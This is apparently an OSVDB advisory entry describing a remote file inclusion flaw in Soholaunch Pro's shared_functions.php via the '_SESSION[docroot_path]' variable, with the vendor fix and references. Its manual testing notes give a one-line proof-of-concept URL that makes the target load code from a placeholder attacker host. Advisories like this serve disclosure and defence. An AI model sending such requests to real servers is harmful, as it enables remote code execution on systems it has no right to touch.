Soholaunch Pro shared_functions.php _SESSION[docroot_path] Variable Remote File Inclusion

2006-11-07T10:33:40
ID OSVDB:30238
Type osvdb
Reporter Dedi Dwianto(the_day@echo.or.id)
Modified 2006-11-07T10:33:40

Description

Vulnerability Description

Soholaunch contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to shared_functions.php not properly sanitizing user input supplied to the '_SESSION[docroot_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 4.9 r41 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Soholaunch contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to shared_functions.php not properly sanitizing user input supplied to the '_SESSION[docroot_path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://[attacker]/inject.txt?

References:

Vendor URL: http://www.soholaunch.com Secunia Advisory ID:22735 Related OSVDB ID: 30237 Other Advisory URL: http://advisories.echo.or.id/adv/adv57-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0073.html Keyword: ECHO_ADV_57_2006 CVE-2006-5796